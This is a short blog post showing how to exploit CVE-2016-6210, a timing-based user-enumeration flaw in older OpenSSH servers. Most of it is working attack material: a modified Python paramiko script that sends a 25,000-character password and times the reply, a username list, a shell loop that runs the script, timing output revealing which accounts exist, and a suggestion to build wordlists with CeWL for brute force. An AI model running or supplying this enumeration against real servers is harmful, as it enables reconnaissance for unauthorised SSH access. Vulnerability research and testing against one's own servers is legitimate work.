The 13th if July a new wild CVE appeared (Yes, Pokemon Go is still a buzz for the moment).
The CVE 2016-6210 allow a user enumeration on an SSH server by comparing request time between non existing user and allowed ones. This vulnerability target OpenSSHD with a version of 7.2p2 or inferior.
That means with a good dictionary you may know which user are present on the server with an SSH access.
This post just demonstrate how to exploit this vulnerability with a simple example.
OpenSSHD <= 7.2p2 - User Enumeration
A tiny python script is present on exploit-db. I had to modify it a bit in order to pass the username in parameter:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
#!/bin/python import paramiko import time import sys user = sys.argv p='A'*25000 ssh = paramiko.SSHClient() starttime=time.clock() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: ssh.connect('192.168.4.231', username=user, password=p) except: endtime=time.clock() total=endtime-starttime print(str(user)+ ": " +str(total))
The script will simply try to connect to
192.168.4.231 with the user passed in
parameter and a password of 25 000 'A' and measure the time of the connection.
We create a simple list of possible user with a non existing user to be able to compare connection times.
[maggick@computer_name tmp]$ cat list nonExistsingUserForSure john root bob user alice max ssh_user
We launch the script against our test server:
[maggick@computer_name tmp]$ while read l; do ./p.py $l; done < list nonExistsingUserForSure: 0.17941999999999997 john: 0.18687900000000002 root: 0.18173099999999998 bob: 0.178726 user: 0.23088699999999995 alice: 0.13389600000000002 max: 0.17069700000000004 ssh_user: 0.24780699999999997
We can easily see that SSH root login is disallowed, and that the user
ssh_user are allowed to connect to the server using SSH.
As often with brute force, the major issue will be to build the dictionary but some tools like CeWL from digininja can help build it.